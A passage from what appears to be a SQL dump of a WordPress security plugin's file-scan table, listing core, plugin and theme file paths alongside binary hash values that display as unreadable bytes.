!-+}Q�V-�','',0,'?'),('m�\n5e~�Õ�x','wp-includes/wp-includes/blocks/calendar.php',0,'i�����cE8,\n','i�����cE8,\n','�O%�7ܧ�^V�x��n~���\r�8���i.3-','',0,'?'),('m��I.E~p�s�','wp-content/plugins/wp-cerber/assets/flags/gb.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���o;T��+<��&�','�=�޺��\Z���PͿ���\\ȝ�F�_���\\�','',0,'?'),('m�5F���ɊR�Ƀy�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-settings-controller.php',0,'	�����)<�Q2�İ��','	�����)<�Q2�İ��','Pp�y�C���W7i~��g��`�����','',0,'?'),('nQ��ʒ\'�k��\"%�','wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=�	���Tc�vL\n*Ȱ','',0,'?'),('n]�j7<3ISsQ�','wp-admin/images/post-formats32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t.E���5G�N\Z�v','(Z�,���Im�Y,·�ԗ��tG��������a','',0,'?'),('n[	X���}�0�','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%ؘ5��a�O�_��','�3½}�߈�6��-������x%�uv�','',0,'?'),('n#�t=�\'����b]{�','wp-includes/js/tinymce/themes/modern/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���E��|�h(Zf�','ӣ	}�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('nAj+�u��VG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�AT)T	��<˹o��','����}��\Z�dv�C��lC\\�{�{�4&[�','',0,'?'),('nSO=�\n9�ȗc��SA','wp-content/themes/sg-window/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�]y`��.{�#��','6��E�ȯX��j<~XS�d��/����','',0,'?'),('nU�N�Q6�H�k�','wp-content/plugins/wp-cerber/assets/flags/sx.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('nZ/1T:{&^�/n���','wp-admin/js/media-gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_8��5o�?�','Ƥ�$�30��I��X��C,b���\"0l�N�F','',0,'?'),('n[m��F�񩇫-','wp-includes/wp-includes/js/jquery/ui/button.js',0,'�	��.��ȴ�fh~O','�	��.��ȴ�fh~O','Û�.�k(5S�1��!����>�^I t�ȭ���.','',0,'?'),('n[�GO�J]@ԱuY','wp-includes/wp-includes/css/dist/list-reusable-blocks/style-rtl.css',0,'AU�L�Y����M��','AU�L�Y����M��','�)�RfZ�����~u3����}\'�?�!>','',0,'?'),('n��Cpp��%�M�','wp-includes/wp-includes/js/thickbox/loadingAnimation.gif',0,'�\"h\r�c���&�','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('n����@��A��F�','wp-admin/network/sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�m�2\Z�.P���','�pA�V��O����i2E�ck�F]Y$SQ�Sl','',0,'?'),('n�	T\r�K�E��lf�','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-control.php',0,'�@V{R#8�7n�n\n�','�@V{R#8�7n�n\n�','��a�H����Muyw?�h:�B��<=��,##�','',0,'?'),('n����ғ}�D\\\n�','wp-includes/wp-includes/widgets/class-wp-widget-custom-html.php',0,'���dz\'E�n�N��','���dz\'E�n�N��','��l.��M|yc�)�Vr�]�Ak�:Ʃ\"�A','',0,'?'),('n���熰�ebWO�u','wp-content/plugins/wordfence/js/jquery.tmpl.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\}�\"���7ڷ��DZ','�.I�H\Z�g\0�H!7`��gޠZ�zȄ�ž6|','',0,'?'),('nŢ�)�c���q^\"','wp-includes/Requests/Exception/HTTP/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9�RaßC�`\0�UT�','�}��=3x�A9����l��p\0�ư�9e.O','',0,'?'),('nȵ��u:�b��fR�','wp-includes/wp-includes/js/jquery/ui/dialog.min.js',0,']2�z�L!E��,�C\Z',']2�z�L!E��,�C\Z','���|\r�Ce>�/k˪�\"E�0�݀V�L�','',0,'?'),('n�к���v�nj=ͮ','wp-admin/includes/class-bulk-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6/M�<ϋ��vk5','�s�q�<��$�wt���Ҫ�kԇ6�KL�','',0,'?'),('n,�Q���3b��O','wp-includes/js/dist/warning.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��⚝q�y���TCg�','xl�:���-�z��AD-j]��2���;/`','',0,'?'),('n���0�9j�v8�\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׭_�s?8f,ؔa��','��ۂ5سq\'ԟ*�.F�Č�կ�ͻ�+\rSI�','',0,'?'),('n��ۗ��vXH)�','wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),('oܛ���Ik?W�x','wp-includes/wp-includes/sitemaps/providers/class-wp-sitemaps-users.php',0,'܇��X%�EWy�m\'��','܇��X%�EWy�m\'��','�|�\rL�ʜэ�|�Ry��6S^�\\��','',0,'?'),('o+��R�D!��. Y','wp-includes/wp-includes/css/dist/editor/editor-styles.min.css',0,'�/Ow�:#��v���\r','�/Ow�:#��v���\r',']��Ɇ���m�{�w��#ߟ^��,n����,>','',0,'?'),('o\'RD-��\0���o��','wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cl�$��r����n<.','��$�M��Ԯ�&���(ᩘs��^	Ϣ*N��','',0,'?'),('o1i�L5���z�$��7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u1��\\�8���;#j-','P����|�l�_���Z��3z<NɧK���','',0,'?'),('oC�\"���Q���t��y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�����%','�4!��H�:�6>�lE��Ec#���a{�A�{','',0,'?'),('oP�c����o�.�r','wp-includes/js/tinymce/skins/lightgray/img/object.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),('oS]�~(��7;�\r�','wp-includes/js/dist/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƾ8O{h�\\�X�f<D','M��\" ��uH��\"B�q*�4��_�\\��[[�!','',0,'?'),('oZ0�������<c�0','wp-includes/SimplePie/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),('oq8��s<`�ӵ)w�:','wp-includes/wp-includes/Text/Diff/Engine/shell.php',0,'��S�����?��z&','��S�����?��z&','�=5��:Pu\'pM�N[�9^�m>z@','',0,'?'),('o}�C܊8�E��G�','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rW�+�`Akæ�V r','U���mְ�E2�e�Io�#�z^aŁ���$G�','',0,'?'),('o�j̄��C-#|E�','wp-content/plugins/wp-cerber/assets/flags/ag.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I�g(4e���j52^G','��2�M�`O���?iX�e�B�q����x��','',0,'?'),('o��z`�7�u��K�$Q','wp-includes/wp-includes/error-protection.php',0,'?5�p��.9�;F�ܧ�','?5�p��.9�;F�ܧ�','֦ �7S�\Z�\\��cdLb|o�1��Y�ã��:','',0,'?'),('o�jĎNA�ħ�Q��E','wp-includes/wp-includes/js/customize-loader.min.js',0,'�-�����#�5&*�o�','�-�����#�5&*�o�','�<ş;\r#8�+=dK���F꡻�S)8�׆>]�','',0,'?'),('o�w*�\nΛ΢GҜ�]','wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('o�%�+p\'idVQ�(>�','wp-includes/wp-includes/Requests/Exception/HTTP/415.php',0,'X��Tb�̮�JU�','X��Tb�̮�JU�','v%�_�\0�b$m�&`���(�=�m<�b\Zo0p','',0,'?'),('o��/�������%','wp-includes/wp-includes/js/dist/is-shallow-equal.js',0,'���	�\n�f@�!릶','���	�\n�f@�!릶','wNT(��`x܌�P�C��1Ow�b�]��ъ�','',0,'?'),('o�x�jL<J����Ī?','wp-includes/wp-includes/js/tinymce/license.txt',0,'o�����x:�`����','o�����x:�`����','Y��#wO�g^\'�b��:�^�	=跨|��','',0,'?'),('o㮚-�;?X:��pҡ','wp-trackback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ьWe=]!B��','��\'ߵ���3�M؞Ø��5���c�o�M�U�%','',0,'?'),('o���Y��څ��X�','wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7� ��(�˿!�\Z7�','Bx�0%Ly�6���!��X\\z/<�n�6=\ZW�','',0,'?'),('o�[��n3u��ʹ�P5','wp-admin/options-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O+�٢���%ڦS�','Y�*7:��!ȡ˦�Ak}���w��2��Z1','',0,'?'),('p��7u�L�_{2Û�','wp-includes/js/jquery/ui/draggable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J���\\O��Љ/�Hp%','�N��B\0�!8\r���o? �)E�C>��','',0,'?'),('p{\r�� �%>/�Z��:','wp-content/plugins/wordfence/views/scanner/issue-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m|�&vfƲ~��','�i\"��m�$�PyM����d��	���S�','',0,'?'),('p:�,�`OlL�(�A','wp-content/plugins/wordfence/views/waf/waf-uninstall-success.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k�~�H���7�<�B��','\0!�F�E���KP��7߻�0��\n;6�}��$','',0,'?'),('pB���e�Gߴ^���R�','wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)/4;�$۔�ެvi\\','�n���i��뗅�N�vX�7�Y]�����D','',0,'?'),('pUy�a	�b��va�;�8','wp-includes/js/comment-reply.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F���D6����x�','!�x��G�����Go�Df�B8xXC�','',0,'?'),('peg�!�3�TGjq�q','wp-includes/wp-includes/js/dist/token-list.min.js',0,'��]L\'9jl7��[#�','��]L\'9jl7��[#�','�\"�Gc��iL���z5�DwN�#G��ZT{*s}�','',0,'?'),('p��.а��[ÍD�','wp-includes/deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���X�;|N.��S_d�?','S5�g���*����r����x�{��&','',0,'?'),('p��4L_�t+?M��t','wp-includes/wp-includes/class-wp-user-request.php',0,'w�?�v��\\����$','w�?�v��\\����$','z����.t(���C�o���	���tV�','',0,'?'),('p��\\*e�\n\rψ��','wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z�83�?w�����W','\r.l]\\)	Z�q���p�]_^�u����J\n�%�','',0,'?'),('p̓0�2@��PF�tk','wp-content/plugins/wordfence/views/common/unsubscribe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y:h3�>��a ݑ�4~','E�q����Tg��O>F-��O�(�IƚZ��z','',0,'?'),('p�}G��J��$��x','wp-includes/block-supports/align.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v(\0����1�i�`','��=o�.�k�4�Ŋ*�P\\������[�','',0,'?'),('p�?��~r��Fb�[��^','wp-content/themes/sg-window/inc/js/one-page-nav.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���*��?��;o','vR��S�/ve�`6��R�g.rp�g]�t����','',0,'?'),('qqC��$�����@','wp-content/plugins/wordfence/views/common/page-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u3�^1!��Gѩ}:�L','8^!c�$u��w�y��)�+	&�&���<�','',0,'?'),('qs��A�t���d�\\','wp-includes/js/dist/warning.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��@\r\nxt������','�w`\0��:�5��=����`�麯1R)T~�','',0,'?'),('q\"�co���>�2Rh�]','wp-admin/includes/plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c��)��yf��t���','���!��������g|:ڧq�*օxɚI�t� ','',0,'?'),('q\'̓�|6��um����','wp-includes/wp-includes/https-migration.php',0,'�s9�4W#2��!H�߾�','�s9�4W#2��!H�߾�','2�|P��Ł�muН���~k��37rz0�x�A�','',0,'?'),('qJ|�Ц����K��aX','wp-includes/wp-includes/js/tinymce/plugins/hr/plugin.min.js',0,'	%>�)���•;��','	%>�)���•;��','؃F��S�[k���&�f� 6+�b�>��','',0,'?'),('qL���I�Lc�','wp-includes/class-wp-recovery-mode-link-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����}f/c�nx5','�k�������ޙ(Z��t�M\0��;�t\r','',0,'?'),('qQr<P�’��|�����','wp-content/themes/sg-window/img/icons/small/yahoo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��Bh�!�:��_','ߝ����})l�����Uy^D�:�ď�','',0,'?'),('qgژ��57�3�J: ','wp-includes/wp-includes/css/dist/block-library/theme-rtl.css',0,'���Ԝ����p1l�','���Ԝ����p1l�','\ns�:���$�}K���%\rr�hM��Ap\r��','',0,'?'),('qh�665�y|�=�?S	','wp-includes/js/jquery/jquery.serialize-object.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�D�B\ru�6����!','��`�RԶ�2ɀ�`��Mx��i�G�fz�C2�','',0,'?'),('q��f���EH�7�d�','wp-includes/css/dist/editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z���Ey��,��~','��t>\'�\"A�†ˊ��	�QN��\Z�gH��','',0,'?'),('q�s���ƞ�ù��','wp-includes/rest-api/endpoints/class-wp-rest-post-types-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����!�Й�~L�C��','֓�2ǟ��lq�~�<%Z����g����','',0,'?'),('q��F~IfD�ө� xZf','wp-content/plugins/wordfence/css/diff.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܀g	��	�$���`r�Q','��$��hEJ^54<$�ӭYc���’�&','',0,'?'),('q����R+�q�\Z�2�','wp-includes/js/dist/edit-post.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')3~���F�<5yV�/','���.���Hs0�QU��JLe�h�\n�\n�','',0,'?'),('q�0\\y*3�Q�>vJ�','wp-content/plugins/wp-cerber/assets/flags/tw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ښ��� .�;���X','U��Ӥ�SQ��׈�{�5�𐮆c-y��','',0,'?'),('q�0���������5','wp-includes/sodium_compat/src/Core32/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5O&?��E�	��%','^%%�hT��,�����k2�Ȯn=n%:��','',0,'?'),('q��5@�*=�&��\\X�','wp-content/plugins/wordfence/lib/wfHelperBin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��!�ȍ��4Q��X#','��չ%-�^�q��U�q�M��eY���','',0,'?'),('q��^2���Al��','wp-content/themes/sg-window/inc/js/sidebar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`h�U��z��csZ�','fC9��H\'6vz�)�voiף����;�U�|r�','',0,'?'),('q�$\'6�e��-W]','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/PHP52/SplFixedArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nb�x	��BC��?���\Z','��e��C8�&\r����h\r��2w�(^Й�V\0','',0,'?'),('q��P��/�%��JYS','wp-content/themes/shootingstar/functions/library.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8hV��&fp\n8��K�','	6[�G�{���	��xTAoI�â�5qϘ','',0,'?'),('r��h��v��Lk/��','wp-admin/network/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q#��ԑ��\Z;f��','��3PJݎ��Y��b�GqA��8œo:?��>�','',0,'?'),('r+zk;� 4��WI','wp-includes/js/tinymce/themes/modern/theme.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(3�o�U�2ŝU�2�','�2.�pt�\"r�`)��\r.C�l�\\\Z��BIX','',0,'?'),('r:��U�j�3N��6��','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',0,'���DBSq&a��_�%','���DBSq&a��_�%','�2��C���Zh+�̴���\'�H��p�H�r','',0,'?'),('rI\0yg�E!���2\0C','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����mx�f�4	\"','���H&�(hn�U�-z$���&��Egj[�M�','',0,'?'),('rK�<v�?�y��43z@','wp-includes/wp-includes/blocks/rss/block.json',0,'_Fɠm(��nJ��ZEG','_Fɠm(��nJ��ZEG','�S�5��X��9������mOX�>s��l��','',0,'?'),('r_��YrL�8�;��8E','wp-content/plugins/wp-cerber/assets/flags/ua.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���V	i��#Ʉ\r','�۽����,jI�7=3I�\0������\"�M7H','',0,'?'),('rd�%�NϱjU\0��Fm�','wp-includes/wp-includes/Requests/IPv6.php',0,'��K�N���knT�','��K�N���knT�','�=��ln&�����ă�J�ӗ���~�����l','',0,'?'),('rhVf&�Pt��瞶�','wp-includes/wp-includes/widgets/class-wp-widget-media-image.php',0,'�dCa�*C^e~OriA�','�dCa�*C^e~OriA�','�L�/�T|����w�pEf1�Ln��!y���','',0,'?'),('rt�IŒg[��;���?','wp-includes/sodium_compat/namespaced/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rV�N�ck0�}/�Ճ�','n�K��kZ��	���� N$ � EК���e�$','',0,'?'),('rz\0rݡ�\"f/�AKI','wp-includes/wp-includes/js/mediaelement/mejs-controls.png',0,'�.۷Z#e0�<�l���','�.۷Z#e0�<�l���','�X�*��\Z��X�(�Z!�Ƚ��D2aB','',0,'?'),('r��)����d��RD�2','wp-content/plugins/wordfence/js/wfdashboard.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Խ�P����`�{i�','=P�z�r���!�?w\Z�/d!��LӪ��1!�','',0,'?'),('r��,e���������','wp-includes/wp-includes/js/jquery/ui/effect-scale.min.js',0,'��KaJ�d���J\'^','��KaJ�d���J\'^','_��q�x#�_�\0��<�J�c��~�ұ�ǫ','',0,'?'),('r�(n՞���j��b\"','wp-admin/js/media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ҋ$����(����','���sݝ���&��գʆ#�_�`�X','',0,'?'),('r��9��;‚j��|','wp-includes/wp-includes/js/dist/dom.min.js',0,'���k��\"���MM�','���k��\"���MM�','D�I�&�\"�H��-���Q࣋�Fzֱ�ev�','',0,'?'),('r�\n�����s�','wp-includes/wp-includes/sodium_compat/lib/namespaced.php',0,'01����vnG��\r�','01����vnG��\r�',']/r~�ʺO���C�c�xB��j/�o��U�I*�','',0,'?'),('r�����q�/4g��B�','wp-includes/wp-includes/images/w-logo-blue-white-bg.png',0,'\0�Ȉk�|�Ѽ���','\0�Ȉk�|�Ѽ���','O�ɗ�o����C��A�/x����<��%4=?','',0,'?'),('r�3�e\\��,S�q','wp-includes/class-wp-block-supports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��C��ie�4���','�8r�ƻ�Iz�R��1L��u?-����','',0,'?'),('r�_�/��HG=�%�<�','wp-includes/images/arrow-pointer-blue-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%m�rތ]4�9c�','��{&DO�z��A�f�/��gá������A]~�(�','',0,'?'),('r�r�(J�g�(�y�t','wp-includes/js/mce-view.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2s�H��ّ;[���	s','��8`9ڰn�-.�	H�Dp��k+�γ��bI','',0,'?'),('r�)�����e�l�','wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�j��u9)�\n6�5','gg(($C���(rw�H\n�O���D!\rl��a�','',0,'?'),('r��\n��b��#��','wp-admin/css/media-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���f�}��E\\','E�:�#��P�c;�&��T�$G@�\Zrp�J�iR','',0,'?'),('r�7��/y*�aڛP] 0','wp-content/plugins/wordfence/views/blocking/blocking-create.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�٥r��zż��S�5�','D{%WQ����Ȱ2����-\\�����l','',0,'?'),('s�As�Y����D]','wp-content/plugins/wordfence/views/scanner/options-group-advanced.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P����Co���>~�','#�~���6��˞45���LW���V��^�','',0,'?'),('sjt�\n�V�� ��(','wp-includes/wp-includes/js/wp-emoji.min.js',0,'+g�D>�w�f�م*�D','+g�D>�w�f�م*�D','M�aF��$�*�M��_�����n8���v�u�','',0,'?'),('s��[B����lE���','wp-includes/wp-includes/js/tinymce/plugins/link/plugin.js',0,'�*NȒmQ������','�*NȒmQ������','�`3�cYQ����9Wޭ#l���p�S+G��4','',0,'?'),('s�E�Ξq�p�B���','wp-admin/css/widgets-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x[ʦ�]��M	��','Y�g_��~��\"��%��ٍ���[#u�دv�','',0,'?'),('s�uĸ��_��Rv4','wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.js',0,'�J����p�°�5Q�','�J����p�°�5Q�','�]Ī����P�M@�Q\n�\\�t�A�w.D��g','',0,'?'),('s����Y�\'�N|��)','wp-includes/wp-includes/js/jquery/jquery.min.js',0,'��	3i��7�L�1�<','��	3i��7�L�1�<','�s��)=\'�5r����l�}�<�(v\'ܘl�x\Z','',0,'?'),('sՉ���m����LV�3�','wp-includes/wp-includes/js/dist/vendor/react.js',0,'��d:�K��D��,$','��d:�K��D��,$',';���\Z��w7��:���[�ܧ/�8��_�@]','',0,'?'),('s�ŏU\'���e@�d�','wp-includes/js/tinymce/plugins/fullscreen/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ғ:�K�[�Iw\\��g�','`e��	�n��O���JM�%�N�hA�{gh�f','',0,'?'),('s��4�����R�X>O�','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h�^n=(��&��݂�N&','S��DIB�z�_-?(Y��pE�y�ƹA�','',0,'?'),('s��˱�Y*u���O�','wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*q��BIt�ӟA<\"','6qQ���`�d!cf��.�Bxq','',0,'?'),('s���*TV�1�oE','wp-includes/js/jquery/ui/effect-blind.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����{5���%�ko','��0ʟ\0`rz){쥵3�[��[q[��ٵ','',0,'?'),('s�C4M�*��*B�)�','wp-includes/css/wp-pointer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HB���v��}�d~�','�72�4����.���ҷCŧ�Z���;7Fr�b','',0,'?'),('t\r�[��Ձ9*5W�b��','wp-includes/block-patterns/text-two-columns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�ۆe���9���!>','bP9���ޤyP���g��\"��Ę��\"V�','',0,'?'),('t�{*��aM��r̎','wp-content/plugins/wp-cerber/assets/flags/tt.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Wp}y����œ�_.�','D�qY\'�?t���}�u���t!��_r^��','',0,'?'),('t/�����Ji6WX��','wp-includes/class-wp-recovery-mode-cookie-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�-�����*xrf�','�8�-�H0F�y���G����������Nj�','',0,'?'),('t/���4�YK@����gm','wp-includes/wp-includes/js/imgareaselect/jquery.imgareaselect.min.js',0,'Q�$������42��','Q�$������42��','\"WV����ь�� /�J4J@��Hq�Gж�','',0,'?'),('t6��O�\ra��Ȇ�f','wp-admin/js/plugin-install.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ct��ݦq�CI','�T�xY�q���*��sP�J�ƶ.���+ʩ�Z','',0,'?'),('t8����p�̋�z{jDp','wp-includes/css/buttons-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��ԝ]z~c6���g6','�L�X橕f��\Z�tC5�i�fS�(�R�&�=�','',0,'?'),('tFS}m��JT�`@��-','wp-includes/wp-includes/js/media-models.min.js',0,'Ӷsj�~�MP����+','Ӷsj�~�MP����+','���7��}Z��9��ڜ<r���kV~��','',0,'?'),('tU�/Ds�Iڤ�st�','wp-includes/js/wp-auth-check.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�L�A��`�2ڴ�Hd','O���f����s����0B��9��Z_��2','',0,'?'),('t[[�=�6u7;Y��T�','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4s[���lAc4�f���','ƺ�>�y�.~yK�^�)*f�����6F�','',0,'?'),('tm6ۗ�q���.��=j','wp-admin/css/colors/blue/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bq�9���\ngI�+','�(���%�$CkO\r����=0�d[qˡ�','',0,'?'),('tm�\n��GO	\'�\Z޵','wp-includes/js/jquery/ui/mouse.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����IJi��\r���','�P��<\n��+�q� ™��NJ�+��s���b���','',0,'?'),('t�����.�Õ�81�','wp-includes/random_compat/random_bytes_com_dotnet.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nM@<��A6�@!�Y��','.#�$.N�.��\\\"�Cuj�%H��EJֈ^a','',0,'?'),('t�W���y�U�5�]�V�','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/link-icons/icons/email.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X����z�(\nV71�','�jP����W�#�7�f�c�����-����@','',0,'?'),('t�����#���~�Grƒ','wp-includes/wp-includes/widgets/class-wp-widget-categories.php',0,'Bb��w�8�[�&�-Y','Bb��w�8�[�&�-Y','�@�Ѩ��pw�x�QX��}\r�y��|��?��','',0,'?'),('t��T�U�1��{��','wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php',0,'��Hx+�07��`�}�','��Hx+�07��`�}�','@qz�j�I���� \0D�a�W��6n�{���y�','',0,'?'),('u�6��4E~�:��','wp-content/plugins/wordfence/images/icons/working-indicator.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����VF���{N	�\'G','�fX��RZ�|:O�b��=f�[y���5 ~	','',0,'?'),('utC�f��IP����','wp-includes/wp-includes/class-walker-category.php',0,')��2�G�E����;H�',')��2�G�E����;H�','GJ8������Y<1Q{<�5�C���[�V��z','',0,'?'),('u�Z�X9���N	�ː','wp-includes/wp-includes/ID3/module.audio-video.quicktime.php',0,'�Ր��%���3/�*','�Ր��%���3/�*','Z{��[�W�ڤ�ʑ\nM%9I5+�$3�@^�','',0,'?'),('u�T�ڃ�@.W�2|4','wp-includes/wp-includes/class-wp-image-editor-imagick.php',0,'�U��--��	�2��6','�U��--��	